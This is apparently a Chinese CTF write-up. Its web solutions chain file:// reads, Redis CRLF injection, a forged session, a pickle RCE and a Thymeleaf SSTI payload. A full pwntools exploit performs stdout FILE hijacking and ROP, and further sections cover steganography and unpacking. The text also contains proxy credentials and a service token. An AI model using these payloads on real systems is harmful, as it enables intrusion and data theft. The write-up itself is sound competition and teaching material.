两个人ak了。
不过…我讨厌国内安全比赛。
web
auth
注册一个用户之后修改头像,avatar_url 支持 file:// 协议,可以任意文件读取,但是没权限读取 /flag,结果经过 base64 后放在头像框内
先读 /app/app.py
avatar_url=file:///app/app.py
发现存在 redis,尝试读 redis 持久化文件 dump.rdb
avatar_url=file:///var/lib/redis/dump.rdb
拿到 Flask secret_key
伪造 admin 的 session cookie 登录
/admin/online-users 会遍历 online_user:* 并反序列化。
虽然用了 RestrictedUnpickler,但放行了 builtins.getattr,而 OnlineUser 在白名单内
可构造 pickle 链:
getattr(getattr(getattr(getattr(OnlineUser, "__init__"),"__globals__")"get")("os"),"system")(cmd) 由于目标是:online_user:<user>
需要把该键覆盖成恶意 pickle
利用点仍是 avatar_url:将请求打到 127.0.0.1:6379,通过 CRLF + RESP 进行协议注入,发送:
AUTH redispass123
SET online_user:<user> <pickle_payload>
EXPIRE online_user:<user> 3600 通过读取 file:///proc/1/task/1/children,拿到子进程 PID:11 14 20
逐个读 file:///proc/<pid>/cmdline
在 pid=11 看到可疑启动命令:
python3 /opt/mcp_service/mcp_server_secure_e938a2d234b7968a885bbbbb63cde7b9.py 直接读这个脚本文件,发现里面存在:
SimpleXMLRPCServer(("0.0.0.0", 54321), ...) 暴露方法 execute_command,同时硬编码 token 为 mcp_secure_token_b2rglxd
在容器内执行 xmlrpc.client.ServerProxy("http://127.0.0.1:54321/") 可以调用
所以反序列化命令可以直接写成:
python3 -c "import xmlrpc.client;print(xmlrpc.client.ServerProxy('http://127.0.0.1:54321/').execute_command('mcp_secure_token_b2rglxd','cat /flag'))" >/tmp/mcp_out.txt 最后用任读从 /tmp/mcp_out.txt 中拿到flag
thymeleaf
- PRNG 状态泄露
用户注册时会从后端返回一个 PRNG 取值,可以从中获得其内部状态,然后反推回 admin 账号的密码
MASK = (1 << 48) - 1
LOW47 = (1 << 47) - 1
def prev_candidates(cur):
base = ((cur & LOW47) << 1) & MASK
return [base, base | 1] 2. Thymeleaf SSTI
控制器中存在
return "admin :: " + section; 当 Thymeleaf 看到 :: 时,会把它当作 fragment expression 去解析,故此处存在 SSTI 漏洞
在高版本 Thymeleaf 里,直接写 ${...} 通常会被拦,但通过预处理和字面量拼接可以绕过:
__|$${...}|__::.x 在通过 SSTI 进行 RCE 的过程中,由于不同 JDK 版本的 Runtime.exec 的多个重载顺序可能不同,需要爆破之后找出可用的重载下标
rt = "''.getClass().forName('java.lang.Runtime').getMethods.?[name=='getRuntime'][0].invoke(null)"
expr = f"{rt}.getClass.getMethods.?[name=='exec'][{idx}].invoke({rt},'/usr/bin/id')" RCE 之后进去的用户是 ctf,需要 root 用户才能读取 /flag
3. 7z提权
find suid:
find / -perm -4000 -type f 发现最主要的 7z,最后使用 /usr/bin/7z a -ttar -an -so /flag 直接获得 flag 内容
pwn
MailSystem
- 注册13个用户可以把admin指针给覆盖掉从而可以登录
- 下界没有考虑导致可以从mail_user_to_user leak到libc,从而覆盖stdout。
- 然后栈迁移 -> rop。
from pwn import *
import os, shutil, tempfile
import socket
context.arch = 'amd64'
context.os = 'linux'
context.log_level = 'info'
EXE = './pwn'
LIBC = './libc.so.6'
LD = './ld-linux-x86-64.so.2'
elf = context.binary = ELF(EXE, checksec=False)
libc = ELF(LIBC, checksec=False)
stdout_offset = -7
host = '192.0.100.2'
port = 9999
socks5 = '3.dart.ccsssc.com:26177'
socks_user = '3hm3n1br'
socks_pass = 'tbkzq6tp'
def _normalize_socks5(value: str) -> str:
if not value:
return ''
value = str(value).strip()
if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
return ''
return value
def _normalize_opt(value: str) -> str:
if value is None:
return ''
value = str(value).strip()
if value.lower() in {'0', 'false', 'off', 'no', 'none'}:
return ''
return value
def _enable_socks5(proxy_spec: str, username: str = '', password: str = ''):
proxy_spec = _normalize_socks5(proxy_spec)
if not proxy_spec:
return
host, sep, port = proxy_spec.rpartition(':')
if not sep or not host or not port.isdigit():
raise ValueError(f'Invalid SOCKS5 proxy: {proxy_spec!r}, expected host:port')
import socks
username = _normalize_opt(username)
password = _normalize_opt(password)
socks.set_default_proxy(
socks.SOCKS5,
host,
int(port),
username=username or None,
password=password or None,
)
socket.socket = socks.socksocket
auth_state = 'enabled' if username or password else 'disabled'
info(f'Using SOCKS5 proxy: {host}:{port} (auth={auth_state})')
def _prepare_loader(path: str) -> str:
if os.access(path, os.X_OK):
return path
dst = os.path.join(tempfile.gettempdir(), 'ld.mail_system')
if not os.path.exists(dst):
shutil.copy2(path, dst)
os.chmod(dst, 0o755)
return dst
def start():
if args.REMOTE:
_enable_socks5(socks5, socks_user, socks_pass)
io = remote(host, port)
else:
ld = _prepare_loader(LD)
io = process([ld, '--library-path', '.', EXE], stdin=PIPE, stdout=PIPE)
io.recvuntil(b'Your choice: ')
return io
def register(io, name: bytes, password: bytes):
io.sendline(b'2')
io.recvuntil(b'Input your name: ')
io.sendline(name)
io.recvuntil(b'Input your password: ')
io.sendline(password)
return io.recvuntil(b'Your choice: ')
def login_user(io, name: bytes, password: bytes):
io.sendline(b'1')
io.recvuntil(b'Input your name: ')
io.sendline(name)
io.recvuntil(b'Input your password: ')
io.sendline(password)
return io.recvuntil(b'Your choice: ')
def login_admin(io):
io.sendline(b'1')
io.recvuntil(b'Input your name: ')
io.send(b'\x00\n')
io.recvuntil(b'Input your password: ')
io.send(b'\x00\n')
return io.recvuntil(b'Your choice: ')
def write_mail(io, data: bytes):
assert 1 <= len(data) <= 0x100
io.sendline(b'1')
io.recvuntil(b'How many bytes do you want to write? (1-256): ')
io.sendline(str(len(data)).encode())
io.recvuntil(b'bytes):\n')
io.send(data)
return io.recvuntil(b'Your choice: ')
def send_mail(io, dst: int, overwrite: bool = True):
io.sendline(b'3')
io.recvuntil(b'Who do you want to send the mail to? (input user ID 1-12)\n')
io.sendline(str(dst).encode())
out = io.recvuntil([b'Overwrite? (y/n): ', b'Your choice: '])
if out.endswith(b'Overwrite? (y/n): '):
io.sendline(b'y' if overwrite else b'n')
out += io.recvuntil(b'Your choice: ')
return out
def logout_user(io):
io.sendline(b'4')
return io.recvuntil(b'Your choice: ')
def admin_logout(io):
io.sendline(b'5')
return io.recvuntil(b'Your choice: ')
def admin_forward(io, src: int, dst: int, which: int, overwrite: bool = True, final_mode: str = 'prompt'):
io.sendline(b'4')
io.recvuntil(b'Enter source user ID (whose mail to forward): (1-12) ')
io.sendline(str(src).encode())
io.recvuntil(b'Enter destination user ID (1-12): ')
io.sendline(str(dst).encode())
out = io.recvuntil([b'Overwrite? (y/n): ', b'Which mail would you like to forward?\n', b'Your choice: '])
if out.endswith(b'Overwrite? (y/n): '):
io.sendline(b'y' if overwrite else b'n')
out += io.recvuntil([b'Which mail would you like to forward?\n', b'Your choice: '])
if b'Which mail would you like to forward?' not in out:
return out
io.recvuntil(b'Your choice: ')
io.sendline(str(which).encode())
if final_mode == 'prompt':
out += io.recvuntil(b'Your choice: ')
else:
out += io.recvrepeat(0.5)
return out
def ban_user(io, name: bytes, password: bytes, victim_id: int = 8):
out = login_user(io, name, password)
if b'Welcome back' not in out:
raise RuntimeError(f'login failed for {name!r}: {out!r}')
# 1. Write mail
# 1 byte
# content = 'A'
# 3. Send mail
# victim_id
# overwrite = y
one = b'1\n1\nA3\n' + str(victim_id).encode() + b'\ny\n'
total = 0
while True:
io.send(one * 6)
total += 6
out = io.recvuntil(b'Your choice: ', timeout=5)
out += io.recvrepeat(0.2)
if b'Account has been banned!' in out:
success(f'{name!r} banned after {total} sends')
return out
if b'Welcome back' in out and b'1. Write mail' not in out:
raise RuntimeError(f'{name!r} state changed unexpectedly: {out!r}')
info(f'{name!r} not banned yet, sent={total}')
def takeover_admin(io):
for i in range(1, 9):
register(io, f'u{i}'.encode(), f'p{i}'.encode())
for i in range(1, 6):
ban_user(io, f'u{i}'.encode(), f'p{i}'.encode())
for i in range(9, 13):
register(io, f'u{i}'.encode(), f'p{i}'.encode())
register(io, b'u13', b'p13')
out = login_admin(io)
assert b'Welcome admin!' in out
def leak_libc(io, src_uid: int = 8):
payload = flat(0xfbad1800, 0, 0, 0) + p16(0xb780)
admin_logout(io)
login_user(io, f'u{src_uid}'.encode(), f'p{src_uid}'.encode())
write_mail(io, payload)
logout_user(io)
login_admin(io)
data = admin_forward(io, src_uid, stdout_offset, 1, final_mode='repeat')
marker = b'Which mail would you like to forward?\n'
leak = data.split(marker, 1)[1].split(b'Mail forwarded', 1)[0]
stdout = u64(leak[0x20:0x28])
libc_base = stdout - libc.sym['_IO_2_1_stdout_']
success(f'libc_base = {hex(libc_base)}')
success(f'stdout = {hex(stdout)}')
return libc_base, stdout
def build_stdout_payload(libc_base: int, stdout: int):
stderr = libc_base + libc.sym['_IO_2_1_stderr_']
stdin = libc_base + libc.sym['_IO_2_1_stdin_']
stage2_addr = libc_base + 0x21d000
wide_data = stdout - 0x50
setcontext_3d = libc_base + libc.sym['setcontext'] + 0x3d
read_addr = libc_base + libc.sym['read']
file_jumps = libc_base + 0x217600
wfile_jumps = libc_base + 0x2170c0
lock_ptr = libc_base + 0x21ca70
d = bytearray(0x100)
def wq(off: int, val: int):
d[off:off + 8] = p64(val)
def wd(off: int, val: int):
d[off:off + 4] = p32(val & 0xffffffff)
# known-good stdout template for this libc
wq(0x00, 0xfbad2887)
for off in [0x08, 0x10, 0x18, 0x20, 0x28, 0x30, 0x38]:
wq(off, stdout + 0x83)
wq(0x40, stdout + 0x84)
wq(0x48, 0)
wq(0x50, 0)
wq(0x58, 0)
wq(0x60, 0)
wq(0x68, stdin)
wq(0x70, 1)
wq(0x78, 0xffffffffffffffff)
wq(0x80, 0x0a000000)
wq(0x88, lock_ptr)
wq(0x90, 0xffffffffffffffff)
wq(0x98, 0)
wq(0xa0, libc_base + 0x21a9a0)
wq(0xa8, 0)
wq(0xb0, 0)
wq(0xb8, 0)
wd(0xc0, 0xffffffff)
wq(0xc8, 0)
wq(0xd0, 0)
wq(0xd8, file_jumps)
wq(0xe0, stderr)
wq(0xe8, stdout)
wq(0xf0, stdin)
wq(0xf8, 0)
# exploit patch:
# _IO_wfile_overflow -> _IO_wdoallocbuf -> call [wide_vtable+0x68]
# with wide_data = stdout-0x50 and wide_vtable = stdout.
wq(0x00, 0xfbad2085) # clear _IO_NO_WRITES and clear the 0x800 bit
wq(0x18, 0) # wide+0x68 -> rdi = 0
wq(0x20, stage2_addr) # wide+0x70 -> rsi = stage2 buffer
wq(0x38, 0x400) # wide+0x88 -> rdx = count
wq(0x48, 0) # wide+0x98 -> rcx
wq(0x50, stage2_addr) # wide+0xa0 -> rsp = stage2 buffer
wq(0x58, read_addr) # wide+0xa8 -> return to read
wq(0x68, setcontext_3d) # stdout[0x68] == fake_wide_vtable[0x68]
wq(0x90, stdout) # wide+0xe0 -> fake wide_vtable = stdout
wq(0xa0, wide_data) # _wide_data = stdout-0x50
wd(0xc0, 1) # _mode > 0
wq(0xd8, wfile_jumps) # use _IO_wfile_jumps
return bytes(d), stage2_addr
io = start()
takeover_admin(io)
success("stage1 done: fake admin acquired")
libc_base, stdout = leak_libc(io)
stdout_payload, stage2_addr = build_stdout_payload(libc_base, stdout)
rop = ROP(libc)
pop_rdi = rop.find_gadget(["pop rdi", "ret"]).address + libc_base
pop_rsi = rop.find_gadget(["pop rsi", "ret"]).address + libc_base
pop_rdx_r12 = (
next(
addr
for addr, g in rop.gadgets.items()
if g.insns == ["pop rdx", "pop r12", "ret"]
)
+ libc_base
)
open_addr = libc_base + libc.sym["open"]
read_addr = libc_base + libc.sym["read"]
write_addr = libc_base + libc.sym["write"]
flag_addr = stage2_addr + 0x180
buf_addr = stage2_addr + 0x200
stage2 = flat(
pop_rdi,
flag_addr,
pop_rsi,
0,
pop_rdx_r12,
0,
0,
open_addr,
pop_rdi,
3,
pop_rsi,
buf_addr,
pop_rdx_r12,
0x100,
0,
read_addr,
pop_rdi,
1,
pop_rsi,
buf_addr,
pop_rdx_r12,
0x100,
0,
write_addr,
)
stage2 = stage2.ljust(0x180, b"\x00") + b"/flag\x00"
stage2 = stage2.ljust(0x400, b"\x00")
admin_logout(io)
login_user(io, b"u10", b"p10")
write_mail(io, stdout_payload)
logout_user(io)
login_admin(io)
admin_forward(io, 10, stdout_offset, 1, final_mode="repeat")
io.send(b"5\n")
sleep(0.1)
io.send(stage2)
data = io.recvrepeat(2.0)
print(data)
io.interactive() misc
steg
xxd看一眼
直接删掉前面的东西,libmagic能正常识别了。
但是打不开,图片IDAT CRC爆炸了。把idat拼起来之后错位。
写一个策略尽可能多恢复点东西:
import zlib
from pathlib import Path
from typing import Iterable
from PIL import Image
PNG_SIG = b'\x89PNG\r\n\x1a\n'
def iter_png_chunks(png: bytes):
if not png.startswith(PNG_SIG):
raise ValueError('Not a PNG stream')
off = len(PNG_SIG)
while off + 12 <= len(png):
length = int.from_bytes(png[off:off + 4], 'big')
ctype = png[off + 4:off + 8]
data_start = off + 8
data_end = data_start + length
crc_end = data_end + 4
if crc_end > len(png):
break
yield ctype, png[data_start:data_end], off, crc_end
off = crc_end
if ctype == b'IEND':
break
def get_png_info(png: bytes):
for ctype, data, _start, _end in iter_png_chunks(png):
if ctype == b'IHDR':
if len(data) != 13:
raise ValueError('Bad IHDR length')
width = int.from_bytes(data[0:4], 'big')
height = int.from_bytes(data[4:8], 'big')
bit_depth = data[8]
color_type = data[9]
compression = data[10]
filter_method = data[11]
interlace = data[12]
return {
'width': width,
'height': height,
'bit_depth': bit_depth,
'color_type': color_type,
'compression': compression,
'filter_method': filter_method,
'interlace': interlace,
'channels': {0: 1, 2: 3, 3: 1, 4: 2, 6: 4}.get(color_type, 0)
}
raise ValueError('IHDR not found')
def paeth_predictor(a: int, b: int, c: int):
p = a + b - c
pa = abs(p - a)
pb = abs(p - b)
pc = abs(p - c)
if pa <= pb and pa <= pc:
return a
if pb <= pc:
return b
return c
def reconstruct_scanline(filter_type: int, filtered: bytes, prior: bytes, channels: int = 3):
stride = len(filtered)
recon = bytearray(stride)
if filter_type == 0: # None
recon[:] = filtered
elif filter_type == 1: # Sub
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
recon[x] = (filtered[x] + a) & 0xff
elif filter_type == 2: # Up
for x in range(stride):
recon[x] = (filtered[x] + prior[x]) & 0xff
elif filter_type == 3: # Average
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
b = prior[x]
recon[x] = (filtered[x] + ((a + b) // 2)) & 0xff
elif filter_type == 4: # Paeth
for x in range(stride):
a = recon[x - channels] if x >= channels else 0
b = prior[x]
c = prior[x - channels] if x >= channels else 0
recon[x] = (filtered[x] + paeth_predictor(a, b, c)) & 0xff
else:
raise ValueError(f'Invalid filter type: {filter_type}')
return bytes(recon)
# Main program
input_file = Path('carved.png')
output_file = Path('carved_repaired.png')
# Read PNG
png_data = input_file.read_bytes()
# Parse PNG info
info = get_png_info(png_data)
width = info['width']
height = info['height']
num_channels = info['channels']
# Extract and concatenate all IDAT chunks
idat_data = bytearray()
idx = 0
while True:
i = png_data.find(b'IDAT', idx)
if i < 0:
break
if i >= 4:
length = int.from_bytes(png_data[i - 4:i], 'big')
data_start = i + 4
data_end = data_start + length
if data_end <= len(png_data):
idat_data.extend(png_data[data_start:data_end])
idx = i + 1
idat_data = bytes(idat_data)
raw = zlib.decompressobj().decompress(idat_data)
row_len = 1 + num_channels * width
expected = row_len * height
max_delta = len(raw) - expected
# dp
neg = -10 ** 9
prev = [neg] * (max_delta + 1)
prev[0] = 1 if raw[0] <= 4 else 0
parents = []
for r in range(1, height):
cur = [neg] * (max_delta + 1)
par = [-1] * (max_delta + 1)
for d in range(max_delta + 1):
best = neg
best_pd = -1
lo = max(0, d - 12)
for pd in range(lo, d + 1):
if prev[pd] > best:
best = prev[pd]
best_pd = pd
if best_pd >= 0:
idx_offset = d + r * row_len
if idx_offset < len(raw):
cur[d] = best + (1 if raw[idx_offset] <= 4 else 0)
par[d] = best_pd
parents.append(par)
prev = cur
def endpoint_score(d):
base_score = prev[d]
penalty = abs(d - max_delta) * 0.2
return base_score - penalty
end_delta = max(range(max_delta + 1), key=endpoint_score)
path = [end_delta]
for r in range(height - 1, 0, -1):
end_delta = parents[r - 1][end_delta]
path.append(end_delta)
path.reverse()
stride = num_channels * width
rows = []
prior = bytearray(stride)
for r, d in enumerate(path):
start = d + r * row_len
filter_type = raw[start]
filtered = raw[start + 1:start + 1 + stride]
try:
recon = reconstruct_scanline(filter_type, filtered, prior, num_channels)
rows.append(recon)
prior = recon
except ValueError:
recon = bytes(stride)
rows.append(recon)
prior = bytearray(stride)
img_data = b''.join(rows)
img = Image.frombytes('RGB', (width, height), img_data)
img.save(output_file) 拿出来是这样一张。
低位lsb,RGB拼接。能看到zip包。
这里小文件可以用crc32爆破了。
于是恢复出来
pass
is
c1!x
xtLf
%fXY
PkaA 解压flag.txt,0宽字符。。。。01编码,复原。
zw = ''.join(ch for ch in text if ch in '\u200b\u200c')
if not zw:
raise ValueError('no zero-width data found')
bits = ''.join('0' if ch == '\u200b' else '1' for ch in zw)
usable = len(bits) // 8 * 8
raw = bytes(int(bits[i:i + 8], 2) for i in range(0, usable, 8))
try:
return raw.decode('utf-8')
except UnicodeDecodeError:
return raw.decode('latin1') reverse
re1
这里拼了个pyc,拿下来pylingual还原。
# Decompiled with PyLingual (https://pylingual.io)
# Internal filename: 'Payload_To_PixelCode_video.py'
# Bytecode version: 3.7.0 (3394)
# Source timestamp: 2026-01-04 04:02:18 UTC (1767499338)
from PIL import Image
import math
import os
import sys
import numpy as np
import imageio
from tqdm import tqdm
def file_to_video(input_file, width=640, height=480, pixel_size=8, fps=10, output_file='video.mp4'):
if not os.path.isfile(input_file):
return None
file_size = os.path.getsize(input_file)
binary_string = ''
with open(input_file, 'rb') as f:
for chunk in tqdm(iterable=iter(lambda: f.read(1024), b''), total=math.ceil(file_size / 1024), unit='KB', desc='读取文件'):
binary_string += ''.join((f'{byte:08b}' for byte in chunk))
xor_key = '10101010'
xor_binary_string = ''
for i in range(0, len(binary_string), 8):
chunk = binary_string[i:i + 8]
if len(chunk) == 8:
chunk_int = int(chunk, 2)
key_int = int(xor_key, 2)
xor_result = chunk_int ^ key_int
xor_binary_string += f'{xor_result:08b}'
else:
xor_binary_string += chunk
binary_string = xor_binary_string
pixels_per_image = width // pixel_size * (height // pixel_size)
num_images = math.ceil(len(binary_string) / pixels_per_image)
frames = []
for i in tqdm(range(num_images), desc='生成视频帧'):
start = i * pixels_per_image
bits = binary_string[start:start + pixels_per_image]
if len(bits) < pixels_per_image:
bits = bits + '0' * (pixels_per_image - len(bits))
img = Image.new('RGB', (width, height), color='white')
for r in range(height // pixel_size):
row_start = r * (width // pixel_size)
row_end = (r + 1) * (width // pixel_size)
row = bits[row_start:row_end]
for c, bit in enumerate(row):
color = (0, 0, 0) if bit == '1' else (255, 255, 255)
x1, y1 = (c * pixel_size, r * pixel_size)
img.paste(color, (x1, y1, x1 + pixel_size, y1 + pixel_size))
frames.append(np.array(img))
with imageio.get_writer(output_file, fps=fps, codec='libx264') as writer:
for frame in tqdm(frames, desc='写入视频帧'):
writer.append_data(frame)
if __name__ == '__main__':
input_path = 'payload'
if os.path.exists(input_path):
file_to_video(input_path)
else:
sys.exit(1) 简单还原下。
from PIL import Image
import cv2
import math
import numpy as np
from tqdm import tqdm
cap = cv2.VideoCapture("video.mp4")
bits = ""
width=640
height=480
pixel_size=8
fps=10
total_frames = int(cap.get(cv2.CAP_PROP_FRAME_COUNT))
for _ in tqdm(range(total_frames)):
ret, frame = cap.read()
if not ret:
break
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
for r in range(height // pixel_size):
for c in range(width // pixel_size):
x = c * pixel_size
y = r * pixel_size
pixel = frame[y + pixel_size // 2, x + pixel_size // 2]
if np.mean(pixel) < 128:
bits += "1"
else:
bits += "0"
cap.release()
xor_key = "10101010"
recovered_bits = ""
for i in range(0, len(bits), 8):
chunk = bits[i : i + 8]
if len(chunk) == 8:
val = int(chunk, 2) ^ int(xor_key, 2)
recovered_bits += f"{val:08b}"
data = bytearray()
for i in range(0, len(recovered_bits), 8):
byte = recovered_bits[i : i + 8]
if len(byte) == 8:
data.append(int(byte, 2))
open("1", "wb").write(data) import hashlib
strs = """8277e0910d750195b448797616e091ad
0cc175b9c0f1b6a831c399e269772661
4b43b0aee35624cd95b910189b3dc231
e358efa489f58062f10dd7316b65649e
f95b70fdc3088560732a5ac135644506
c81e728d9d4c2f636f067f89cc14862c
92eb5ffee6ae2fec3ad71c777531578f
c4ca4238a0b923820dcc509a6f75849b
8fa14cdd754f91cc6554c9e71929cce7
c9f0f895fb98ab9159f51fd0297e236d
336d5ebc5436534e61d16e63ddfca327
eccbc87e4b5ce2fe28308fd9f2a7baf3
cfcd208495d565ef66e7dff9f98764da
a87ff679a2f3e71d9181a67b7542122c
e4da3b7fbbce2345d7772b0674a318d5
e1671797c52e15f763380b45e841ec32
8f14e45fceea167a5a36dedd4bea2543
1679091c5a880faf6fb5e6087eb1b2dc
4a8a08f09d37b73795649038408b5f33
cbb184dd8e05c9709e5dcaedaa0495cf""".splitlines()
maps = {}
for i in range(0,255):
r = hashlib.md5(chr(i).encode()).hexdigest()
maps[r] = chr(i)
for s in strs:
print(maps[s], end="") re2
类似upx的壳。解压完了走这个地方0x4014E0跳出。
没带windows只能unicorn跑了。需要模拟几个系统函数。
api_stubs = {
"LoadLibraryA": api_base + 0x100,
"ExitProcess": api_base + 0x200,
"GetProcAddress": api_base + 0x300,
"VirtualProtect": api_base + 0x400,
"exit": api_base + 0x500,
} 能取出来一个base64。解码是下一个stage。
import base64
import struct
import os
import pefile
from unicorn import Uc
from unicorn.x86_const import *
from unicorn.unicorn_const import *
os.makedirs("out", exist_ok=True)
packed_pe = pefile.PE("challenge.exe")
packed_image = open("challenge.exe", "rb").read()
packed_base = packed_pe.OPTIONAL_HEADER.ImageBase
packed_size = (packed_pe.OPTIONAL_HEADER.SizeOfImage + 0xFFF) & ~0xFFF
mu = Uc(UC_ARCH_X86, UC_MODE_64)
mu.mem_map(packed_base, packed_size)
mu.mem_write(packed_base, packed_image[: packed_pe.OPTIONAL_HEADER.SizeOfHeaders])
for packed_section in packed_pe.sections:
packed_raw = packed_image[
packed_section.PointerToRawData : packed_section.PointerToRawData + packed_section.SizeOfRawData
]
if packed_raw:
mu.mem_write(packed_base + packed_section.VirtualAddress, packed_raw)
stack_base = 0x01000000
stack_size = 0x00200000
mu.mem_map(stack_base, stack_size)
mu.reg_write(UC_X86_REG_RSP, stack_base + stack_size - 0x10000)
api_base = 0x03000000
mu.mem_map(api_base, 0x00020000)
api_stubs = {
"LoadLibraryA": api_base + 0x100,
"ExitProcess": api_base + 0x200,
"GetProcAddress": api_base + 0x300,
"VirtualProtect": api_base + 0x400,
"exit": api_base + 0x500,
}
for api_stub in api_stubs.values():
mu.mem_write(api_stub, b"\xC3")
for import_entry in packed_pe.DIRECTORY_ENTRY_IMPORT:
for import_symbol in import_entry.imports:
if not import_symbol.name:
continue
import_name = import_symbol.name.decode()
if import_name in api_stubs:
mu.mem_write(import_symbol.address, struct.pack("<Q", api_stubs[import_name]))
state = {"stop": False, "next_fake": api_base + 0x1000}
dll_handles: dict[str, int] = {}
symbol_addrs: dict[tuple[int, str], int] = {}
addr_to_name: dict[int, str] = {}
def on_code(mu: Uc, address: int, _size: int, user_data: dict) -> None:
if address == 0x4014E0:
print("reached 0x4014E0", stop)
user_data["stop"] = True
mu.emu_stop()
return
if address == api_stubs["LoadLibraryA"]:
print(f"called LoadLibraryA")
rcx = mu.reg_read(UC_X86_REG_RCX)
dll_name_bytes = bytearray()
while True:
current = mu.mem_read(rcx, 1)[0]
if current == 0:
break
dll_name_bytes.append(current)
rcx += 1
dll_name = dll_name_bytes.decode("latin1")
handle = dll_handles.setdefault(dll_name, api_base + 0x8000 + len(dll_handles) * 0x100)
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, handle)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address == api_stubs["GetProcAddress"]:
print(f"called GetProcAddress")
handle = mu.reg_read(UC_X86_REG_RCX)
rdx = mu.reg_read(UC_X86_REG_RDX)
symbol_name_bytes = bytearray()
while True:
current = mu.mem_read(rdx, 1)[0]
if current == 0:
break
symbol_name_bytes.append(current)
rdx += 1
symbol_name = symbol_name_bytes.decode("latin1")
symbol_key = (handle, symbol_name)
if symbol_key not in symbol_addrs:
fake_addr = user_data["next_fake"]
user_data["next_fake"] += 0x10
symbol_addrs[symbol_key] = fake_addr
addr_to_name[fake_addr] = symbol_name
mu.mem_write(fake_addr, b"\xC3" * 8)
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, symbol_addrs[symbol_key])
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address == api_stubs["VirtualProtect"]:
print(f"called VirtualProtect")
old_protect_ptr = mu.reg_read(UC_X86_REG_R9)
if old_protect_ptr:
mu.mem_write(old_protect_ptr, struct.pack("<I", 0x20))
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, 1)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
return
if address in (api_stubs["ExitProcess"], api_stubs["exit"]):
print(f"called ExitProcess")
user_data["stop"] = True
mu.emu_stop()
return
if address not in addr_to_name:
return
fake_name = addr_to_name[address]
fake_result = 0
if fake_name == "GetCurrentProcess":
fake_result = 114514
elif fake_name in {"GetCurrentProcessId", "GetCurrentThreadId", "GetTickCount"}:
fake_result = 1
elif fake_name == "QueryPerformanceCounter":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, struct.pack("<Q", 1))
fake_result = 1
elif fake_name == "GetSystemTimeAsFileTime":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, struct.pack("<Q", 0))
elif fake_name == "GetStartupInfoA":
out_ptr = mu.reg_read(UC_X86_REG_RCX)
mu.mem_write(out_ptr, b"\x00" * 0x68)
elif fake_name == "GetModuleHandleA":
fake_result = packed_base
elif fake_name in {
"VirtualQuery",
"RtlAddFunctionTable",
"InitializeCriticalSection",
"DeleteCriticalSection",
"EnterCriticalSection",
"LeaveCriticalSection",
"SetUnhandledExceptionFilter",
}:
fake_result = 1
rsp = mu.reg_read(UC_X86_REG_RSP)
ret_addr = struct.unpack("<Q", mu.mem_read(rsp, 8))[0]
mu.reg_write(UC_X86_REG_RSP, rsp + 8)
mu.reg_write(UC_X86_REG_RAX, fake_result)
mu.reg_write(UC_X86_REG_RIP, ret_addr)
mu.hook_add(UC_HOOK_CODE, on_code, state)
mu.emu_start(packed_base + packed_pe.OPTIONAL_HEADER.AddressOfEntryPoint, 0)
loader_dump = bytes(mu.mem_read(packed_base, 0x15000))
blob_start = loader_dump.find(b"TVqQAAMAAAAEAAAA//8A")
print(blob_start)
blob_end = blob_start
while blob_end < len(loader_dump) and loader_dump[blob_end] in "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=":
blob_end += 1
stage2_enc = base64.b64decode(loader_dump[blob_start:blob_end])
open("out/stage2.exe", "wb").write(stage2_enc) 这里做了一次解密。
进去扫一眼大概就知道rc4了。
rc4 key在0x4070C0。可以直接跑,跑完就有.rdata和.hello里的内容。